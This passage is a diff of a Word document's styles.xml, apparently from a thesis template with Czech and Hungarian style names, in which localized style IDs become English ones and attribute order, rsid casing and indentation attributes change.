     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="FootnoteCharacters">
+  <w:style w:type="character" w:styleId="FootnoteCharacters" w:customStyle="1">
     <w:name w:val="Footnote Characters"/>
     <w:qFormat/>
     <w:rPr>
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Znakapoznpodarou">
+  <w:style w:type="character" w:styleId="FootnoteReference">
     <w:name w:val="footnote reference"/>
     <w:rPr>
       <w:vertAlign w:val="superscript"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="TextbublinyChar">
+  <w:style w:type="character" w:styleId="TextbublinyChar" w:customStyle="1">
     <w:name w:val="Text bubliny Char"/>
-    <w:link w:val="Textbubliny"/>
-    <w:qFormat/>
-    <w:rsid w:val="00350AEC"/>
+    <w:link w:val="BalloonText"/>
+    <w:qFormat/>
+    <w:rsid w:val="00350aec"/>
     <w:rPr>
       <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
       <w:sz w:val="16"/>
@@ -2935,48 +2492,47 @@
       <w:lang w:val="en-US" w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="ZkladntextChar">
+  <w:style w:type="character" w:styleId="ZkladntextChar" w:customStyle="1">
     <w:name w:val="Základní text Char"/>
-    <w:link w:val="Zkladntext"/>
-    <w:qFormat/>
-    <w:rsid w:val="0090541F"/>
+    <w:qFormat/>
+    <w:rsid w:val="0090541f"/>
     <w:rPr>
       <w:sz w:val="24"/>
       <w:szCs w:val="24"/>
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="tmutatkiemels">
+  <w:style w:type="character" w:styleId="tmutatkiemels" w:customStyle="1">
     <w:name w:val="Útmutató kiemelés"/>
     <w:qFormat/>
-    <w:rsid w:val="006F512E"/>
+    <w:rsid w:val="006f512e"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="tmutatfontos">
+  <w:style w:type="character" w:styleId="tmutatfontos" w:customStyle="1">
     <w:name w:val="Útmutató fontos"/>
     <w:qFormat/>
-    <w:rsid w:val="006F512E"/>
+    <w:rsid w:val="006f512e"/>
     <w:rPr>
       <w:b/>
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Irodalomjegyzkforrs">
+  <w:style w:type="character" w:styleId="Irodalomjegyzkforrs" w:customStyle="1">
     <w:name w:val="Irodalomjegyzék forrás"/>
     <w:qFormat/>
-    <w:rsid w:val="006F512E"/>
+    <w:rsid w:val="006f512e"/>
     <w:rPr>
       <w:i/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Nzevknihy">
+  <w:style w:type="character" w:styleId="BookTitle">
     <w:name w:val="Book Title"/>
     <w:uiPriority w:val="33"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
+    <w:rsid w:val="003f5425"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
@@ -2984,12 +2540,12 @@
       <w:spacing w:val="5"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="VrazncittChar">
+  <w:style w:type="character" w:styleId="VrazncittChar" w:customStyle="1">
     <w:name w:val="Výrazný citát Char"/>
-    <w:link w:val="Vrazncitt"/>
+    <w:link w:val="IntenseQuote"/>
     <w:uiPriority w:val="30"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
+    <w:rsid w:val="003f5425"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
@@ -3001,11 +2557,11 @@
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Odkazintenzivn">
+  <w:style w:type="character" w:styleId="IntenseReference">
     <w:name w:val="Intense Reference"/>
     <w:uiPriority w:val="32"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
+    <w:rsid w:val="003f5425"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
@@ -3015,42 +2571,42 @@
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Odkazjemn">
+  <w:style w:type="character" w:styleId="SubtleReference">
     <w:name w:val="Subtle Reference"/>
     <w:uiPriority w:val="31"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
+    <w:rsid w:val="003f5425"/>
     <w:rPr>
       <w:smallCaps/>
       <w:color w:val="C0504D"/>
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Zdraznn">
+  <w:style w:type="character" w:styleId="Emphasis">
     <w:name w:val="Emphasis"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
+    <w:rsid w:val="003f5425"/>
     <w:rPr>
       <w:i/>
       <w:iCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Zdraznnjemn">
+  <w:style w:type="character" w:styleId="SubtleEmphasis">
     <w:name w:val="Subtle Emphasis"/>
     <w:uiPriority w:val="19"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
+    <w:rsid w:val="003f5425"/>
     <w:rPr>
       <w:i/>
       <w:iCs/>
       <w:color w:val="808080"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Zdraznnintenzivn">
+  <w:style w:type="character" w:styleId="IntenseEmphasis">
     <w:name w:val="Intense Emphasis"/>
     <w:uiPriority w:val="21"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
+    <w:rsid w:val="003f5425"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
@@ -3059,12 +2615,12 @@
       <w:color w:val="4F81BD"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="CittChar">
+  <w:style w:type="character" w:styleId="CittChar" w:customStyle="1">
     <w:name w:val="Citát Char"/>
-    <w:link w:val="Citt"/>
+    <w:link w:val="Quote"/>
     <w:uiPriority w:val="29"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
+    <w:rsid w:val="003f5425"/>
     <w:rPr>
       <w:i/>
       <w:iCs/>
@@ -3074,59 +2630,59 @@
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Siln">
+  <w:style w:type="character" w:styleId="Strong">
     <w:name w:val="Strong"/>
     <w:qFormat/>
-    <w:rsid w:val="003F5425"/>
+    <w:rsid w:val="003f5425"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="StyleUnderline">
+  <w:style w:type="character" w:styleId="StyleUnderline" w:customStyle="1">
     <w:name w:val="Style Underline"/>
     <w:qFormat/>
-    <w:rsid w:val="00D07335"/>
+    <w:rsid w:val="00d07335"/>
     <w:rPr>
       <w:u w:val="single"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="Odkaznakoment">
+  <w:style w:type="character" w:styleId="CommentReference">
     <w:name w:val="annotation reference"/>
-    <w:basedOn w:val="Standardnpsmoodstavce"/>
-    <w:qFormat/>
-    <w:rsid w:val="00630A92"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:qFormat/>
+    <w:rsid w:val="00630a92"/>
     <w:rPr>
       <w:sz w:val="16"/>
       <w:szCs w:val="16"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="TextkomenteChar">
+  <w:style w:type="character" w:styleId="TextkomenteChar" w:customStyle="1">
     <w:name w:val="Text komentáře Char"/>
-    <w:basedOn w:val="Standardnpsmoodstavce"/>
-    <w:link w:val="Textkomente"/>
-    <w:qFormat/>
-    <w:rsid w:val="00630A92"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="CommentText"/>
+    <w:qFormat/>
+    <w:rsid w:val="00630a92"/>
     <w:rPr>
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="PedmtkomenteChar">
+  <w:style w:type="character" w:styleId="PedmtkomenteChar" w:customStyle="1">
     <w:name w:val="Předmět komentáře Char"/>
     <w:basedOn w:val="TextkomenteChar"/>
-    <w:link w:val="Pedmtkomente"/>
-    <w:qFormat/>
-    <w:rsid w:val="00630A92"/>
+    <w:link w:val="annotationsubject"/>
+    <w:qFormat/>
+    <w:rsid w:val="00630a92"/>
     <w:rPr>
       <w:b/>
       <w:bCs/>
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis1Char">
+  <w:style w:type="character" w:styleId="Nadpis1Char" w:customStyle="1">
     <w:name w:val="Nadpis 1 Char"/>
-    <w:basedOn w:val="Standardnpsmoodstavce"/>
-    <w:link w:val="Nadpis1"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading1"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
     <w:rsid w:val="00415288"/>
@@ -3140,12 +2696,12 @@
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Nadpis2Char">
+  <w:style w:type="character" w:styleId="Nadpis2Char" w:customStyle="1">
     <w:name w:val="Nadpis 2 Char"/>
-    <w:basedOn w:val="Standardnpsmoodstavce"/>
-    <w:link w:val="Nadpis2"/>
-    <w:qFormat/>
-    <w:rsid w:val="000C3C29"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading2"/>
+    <w:qFormat/>
+    <w:rsid w:val="000c3c29"/>
     <w:rPr>
       <w:rFonts w:cs="Arial"/>
       <w:b/>
@@ -3156,59 +2712,62 @@
       <w:lang w:val="en-US" w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Heading">
+  <w:style w:type="paragraph" w:styleId="Heading" w:customStyle="1">
     <w:name w:val="Heading"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Zkladntext"/>
-    <w:qFormat/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:spacing w:before="240"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:ascii="Liberation Sans" w:eastAsia="Arial Unicode MS" w:hAnsi="Liberation Sans" w:cs="Arial Unicode MS"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="BodyText"/>
+    <w:qFormat/>
+    <w:pPr>
+      <w:keepNext w:val="true"/>
+      <w:spacing w:before="240" w:after="120"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:eastAsia="Arial Unicode MS" w:cs="Arial Unicode MS"/>
       <w:sz w:val="28"/>
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Zkladntext">
+  <w:style w:type="paragraph" w:styleId="BodyText">
     <w:name w:val="Body Text"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:link w:val="ZkladntextChar"/>
     <w:pPr>
-      <w:spacing w:before="360"/>
-      <w:ind w:firstLine="0"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Seznam">
+      <w:spacing w:before="360" w:after="120"/>
+      <w:ind w:hanging="0"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="List">
     <w:name w:val="List"/>
-    <w:basedOn w:val="Zkladntext"/>
+    <w:basedOn w:val="BodyText"/>
+    <w:pPr/>
     <w:rPr>
       <w:rFonts w:cs="Arial Unicode MS"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Titulek">
+  <w:style w:type="paragraph" w:styleId="Caption">
     <w:name w:val="caption"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="007A4231"/>
+    <w:rsid w:val="007a4231"/>
     <w:pPr>
       <w:spacing w:before="120" w:after="240"/>
-      <w:ind w:firstLine="0"/>
+      <w:ind w:hanging="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
       <w:b/>
       <w:bCs/>
       <w:sz w:val="20"/>
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Index">
+  <w:style w:type="paragraph" w:styleId="Index" w:customStyle="1">
     <w:name w:val="Index"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:qFormat/>
     <w:pPr>
       <w:suppressLineNumbers/>
@@ -3217,34 +2776,38 @@
       <w:rFonts w:cs="Arial Unicode MS"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="HeaderandFooter">
+  <w:style w:type="paragraph" w:styleId="HeaderandFooter" w:customStyle="1">
     <w:name w:val="Header and Footer"/>
-    <w:basedOn w:val="Normln"/>
-    <w:qFormat/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Zhlav">
+    <w:basedOn w:val="Normal"/>
+    <w:qFormat/>
+    <w:pPr/>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Header">
     <w:name w:val="header"/>
-    <w:basedOn w:val="Normln"/>
-    <w:rsid w:val="00C00B3C"/>
+    <w:basedOn w:val="Normal"/>
+    <w:rsid w:val="00c00b3c"/>
     <w:pPr>
       <w:tabs>
-        <w:tab w:val="center" w:pos="4320"/>
-        <w:tab w:val="right" w:pos="8640"/>
+        <w:tab w:val="clear" w:pos="720"/>
+        <w:tab w:val="center" w:pos="4320" w:leader="none"/>
+        <w:tab w:val="right" w:pos="8640" w:leader="none"/>
       </w:tabs>
-      <w:ind w:firstLine="0"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Nzev">
+      <w:ind w:hanging="0"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Title">
     <w:name w:val="Title"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Podnadpis"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Subtitle"/>
     <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="00730B3C"/>
-    <w:pPr>
-      <w:keepNext/>
-      <w:spacing w:line="240" w:lineRule="auto"/>
-      <w:ind w:firstLine="0"/>
+    <w:rsid w:val="00730b3c"/>
+    <w:pPr>
+      <w:keepNext w:val="true"/>
+      <w:spacing w:lineRule="auto" w:line="240"/>
+      <w:ind w:hanging="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
@@ -3257,32 +2820,32 @@
       <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Cmlapszerz">
+  <w:style w:type="paragraph" w:styleId="Cmlapszerz" w:customStyle="1">
     <w:name w:val="Címlap szerző"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:autoRedefine/>
     <w:qFormat/>
     <w:rsid w:val="00171054"/>
     <w:pPr>
-      <w:keepNext/>
-      <w:spacing w:after="240" w:line="240" w:lineRule="auto"/>
-      <w:ind w:firstLine="0"/>
+      <w:keepNext w:val="true"/>
+      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="240"/>
+      <w:ind w:hanging="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
       <w:sz w:val="40"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Podnadpis">
+  <w:style w:type="paragraph" w:styleId="Subtitle">
     <w:name w:val="Subtitle"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="009C1C93"/>
+    <w:rsid w:val="009c1c93"/>
     <w:pPr>
       <w:keepLines/>
       <w:spacing w:before="120" w:after="4200"/>
-      <w:ind w:firstLine="0"/>
+      <w:ind w:hanging="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
@@ -3290,41 +2853,44 @@
       <w:sz w:val="32"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Zpat">
+  <w:style w:type="paragraph" w:styleId="Footer">
     <w:name w:val="footer"/>
-    <w:basedOn w:val="Normln"/>
-    <w:rsid w:val="00C00B3C"/>
+    <w:basedOn w:val="Normal"/>
+    <w:rsid w:val="00c00b3c"/>
     <w:pPr>
       <w:tabs>
-        <w:tab w:val="center" w:pos="4320"/>
-        <w:tab w:val="right" w:pos="8640"/>
+        <w:tab w:val="clear" w:pos="720"/>
+        <w:tab w:val="center" w:pos="4320" w:leader="none"/>
+        <w:tab w:val="right" w:pos="8640" w:leader="none"/>
       </w:tabs>
-      <w:ind w:firstLine="0"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Obsah2">
+      <w:ind w:hanging="0"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC2">
     <w:name w:val="toc 2"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
-    <w:rsid w:val="009C1C93"/>
-    <w:pPr>
-      <w:spacing w:after="0"/>
-      <w:ind w:left="238" w:firstLine="0"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Nyilatkozatcm">
+    <w:rsid w:val="009c1c93"/>
+    <w:pPr>
+      <w:spacing w:before="0" w:after="0"/>
+      <w:ind w:hanging="0" w:start="238"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Nyilatkozatcm" w:customStyle="1">
     <w:name w:val="Nyilatkozat cím"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:qFormat/>
     <w:pPr>
-      <w:keepNext/>
+      <w:keepNext w:val="true"/>
       <w:pageBreakBefore/>
-      <w:spacing w:after="640"/>
-      <w:ind w:firstLine="0"/>
+      <w:spacing w:before="0" w:after="640"/>
+      <w:ind w:hanging="0"/>
       <w:jc w:val="center"/>
     </w:pPr>
     <w:rPr>
@@ -3333,160 +2899,175 @@
       <w:sz w:val="36"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Nyilatkozatkeltezs">
+  <w:style w:type="paragraph" w:styleId="Nyilatkozatkeltezs" w:customStyle="1">
     <w:name w:val="Nyilatkozat keltezés"/>
     <w:basedOn w:val="Nyilatkozatszveg"/>
     <w:qFormat/>
-    <w:rsid w:val="00854BDC"/>
+    <w:rsid w:val="00854bdc"/>
     <w:pPr>
       <w:spacing w:before="240" w:after="960"/>
     </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Obsah1">
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC1">
     <w:name w:val="toc 1"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
-    <w:rsid w:val="00D1632F"/>
+    <w:rsid w:val="00d1632f"/>
     <w:pPr>
       <w:tabs>
-        <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
+        <w:tab w:val="clear" w:pos="720"/>
+        <w:tab w:val="right" w:pos="8494" w:leader="dot"/>
       </w:tabs>
-      <w:spacing w:after="0"/>
-      <w:ind w:firstLine="0"/>
+      <w:spacing w:before="0" w:after="0"/>
+      <w:ind w:hanging="0"/>
     </w:pPr>
     <w:rPr>
       <w:b/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Obsah3">
+  <w:style w:type="paragraph" w:styleId="TOC3">
     <w:name w:val="toc 3"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="39"/>
-    <w:rsid w:val="009C1C93"/>
-    <w:pPr>
-      <w:spacing w:after="0"/>
-      <w:ind w:left="482" w:firstLine="0"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Obsah4">
+    <w:rsid w:val="009c1c93"/>
+    <w:pPr>
+      <w:spacing w:before="0" w:after="0"/>
+      <w:ind w:hanging="0" w:start="482"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC4">
     <w:name w:val="toc 4"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:semiHidden/>
-    <w:rsid w:val="009C1C93"/>
-    <w:pPr>
-      <w:spacing w:after="0"/>
-      <w:ind w:left="720" w:firstLine="0"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Obsah5">
+    <w:rsid w:val="009c1c93"/>
+    <w:pPr>
+      <w:spacing w:before="0" w:after="0"/>
+      <w:ind w:hanging="0" w:start="720"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC5">
     <w:name w:val="toc 5"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:semiHidden/>
-    <w:rsid w:val="009C1C93"/>
-    <w:pPr>
-      <w:spacing w:after="0"/>
-      <w:ind w:left="958" w:firstLine="0"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Obsah6">
+    <w:rsid w:val="009c1c93"/>
+    <w:pPr>
+      <w:spacing w:before="0" w:after="0"/>
+      <w:ind w:hanging="0" w:start="958"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC6">
     <w:name w:val="toc 6"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:semiHidden/>
-    <w:rsid w:val="009C1C93"/>
-    <w:pPr>
-      <w:spacing w:after="0"/>
-      <w:ind w:left="1202"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Obsah7">
+    <w:rsid w:val="009c1c93"/>
+    <w:pPr>
+      <w:spacing w:before="0" w:after="0"/>
+      <w:ind w:start="1202"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC7">
     <w:name w:val="toc 7"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:semiHidden/>
     <w:pPr>
-      <w:ind w:left="1440"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Obsah8">
+      <w:ind w:start="1440"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC8">
     <w:name w:val="toc 8"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:semiHidden/>
     <w:pPr>
-      <w:ind w:left="1680"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Obsah9">
+      <w:ind w:start="1680"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="TOC9">
     <w:name w:val="toc 9"/>
-    <w:basedOn w:val="Normln"/>
-    <w:next w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
+    <w:next w:val="Normal"/>
     <w:autoRedefine/>
     <w:semiHidden/>
     <w:pPr>
-      <w:ind w:left="1920"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Irodalomjegyzksor">
+      <w:ind w:start="1920"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Irodalomjegyzksor" w:customStyle="1">
     <w:name w:val="Irodalomjegyzék sor"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:autoRedefine/>
     <w:qFormat/>
-    <w:rsid w:val="00B96880"/>
+    <w:rsid w:val="00b96880"/>
     <w:pPr>
       <w:numPr>
+        <w:ilvl w:val="0"/>
         <w:numId w:val="2"/>
       </w:numPr>
       <w:tabs>
-        <w:tab w:val="left" w:pos="567"/>
+        <w:tab w:val="clear" w:pos="720"/>
+        <w:tab w:val="left" w:pos="567" w:leader="none"/>
       </w:tabs>
-      <w:spacing w:before="120" w:after="240" w:line="240" w:lineRule="auto"/>
-      <w:ind w:left="567" w:hanging="567"/>
-      <w:jc w:val="left"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Textpoznpodarou">
+      <w:spacing w:lineRule="auto" w:line="240" w:before="120" w:after="240"/>
+      <w:ind w:hanging="567" w:start="567"/>
+      <w:jc w:val="start"/>
+    </w:pPr>
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="FootnoteText">
     <w:name w:val="footnote text"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:semiHidden/>
-    <w:rsid w:val="00B50CAA"/>
+    <w:rsid w:val="00b50caa"/>
+    <w:pPr/>
     <w:rPr>
       <w:sz w:val="20"/>
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Fejezetcimszmozsnlkl">
+  <w:style w:type="paragraph" w:styleId="Fejezetcimszmozsnlkl" w:customStyle="1">
     <w:name w:val="Fejezetcim számozás nélkül"/>
-    <w:basedOn w:val="Nadpis1"/>
-    <w:next w:val="Normln"/>
-    <w:qFormat/>
-    <w:rsid w:val="00D1632F"/>
+    <w:basedOn w:val="Heading1"/>
+    <w:next w:val="Normal"/>
+    <w:qFormat/>
+    <w:rsid w:val="00d1632f"/>
     <w:pPr>
       <w:numPr>
+        <w:ilvl w:val="0"/>
         <w:numId w:val="0"/>
       </w:numPr>
-      <w:spacing w:before="240"/>
+      <w:spacing w:before="240" w:after="480"/>
       <w:ind w:firstLine="720"/>
     </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Source">
+    <w:rPr/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Source" w:customStyle="1">
     <w:name w:val="Source"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:autoRedefine/>
     <w:qFormat/>
     <w:pPr>
-      <w:keepNext/>
+      <w:keepNext w:val="true"/>
       <w:pBdr>
         <w:top w:val="single" w:sz="8" w:space="1" w:color="000000"/>
         <w:left w:val="single" w:sz="8" w:space="4" w:color="000000"/>
@@ -3494,22 +3075,22 @@
         <w:right w:val="single" w:sz="8" w:space="4" w:color="000000"/>
       </w:pBdr>
       <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-      <w:spacing w:line="240" w:lineRule="auto"/>
-      <w:ind w:firstLine="0"/>
+      <w:spacing w:lineRule="auto" w:line="240"/>
+      <w:ind w:hanging="0"/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
       <w:sz w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Textbubliny">
+  <w:style w:type="paragraph" w:styleId="BalloonText">
     <w:name w:val="Balloon Text"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:link w:val="TextbublinyChar"/>
     <w:qFormat/>
-    <w:rsid w:val="00350AEC"/>
-    <w:pPr>
-      <w:spacing w:line="240" w:lineRule="auto"/>
+    <w:rsid w:val="00350aec"/>
+    <w:pPr>
+      <w:spacing w:lineRule="auto" w:line="240"/>
     </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
@@ -3517,25 +3098,25 @@
       <w:szCs w:val="16"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:customStyle="1" w:styleId="tmutat">
+  <w:style w:type="paragraph" w:styleId="tmutat" w:customStyle="1">
     <w:name w:val="Útmutató"/>
-    <w:basedOn w:val="Normln"/>
+    <w:basedOn w:val="Normal"/>
     <w:qFormat/>
     <w:rsid w:val="00267677"/>
     <w:pPr>
-      <w:spacing w:line="240" w:lineRule="auto"/>
-      <w:ind w:firstLine="0"/>
+      <w:spacing w:lineRule="auto" w:line="240"/>
+      <w:ind w:hanging="0"/>
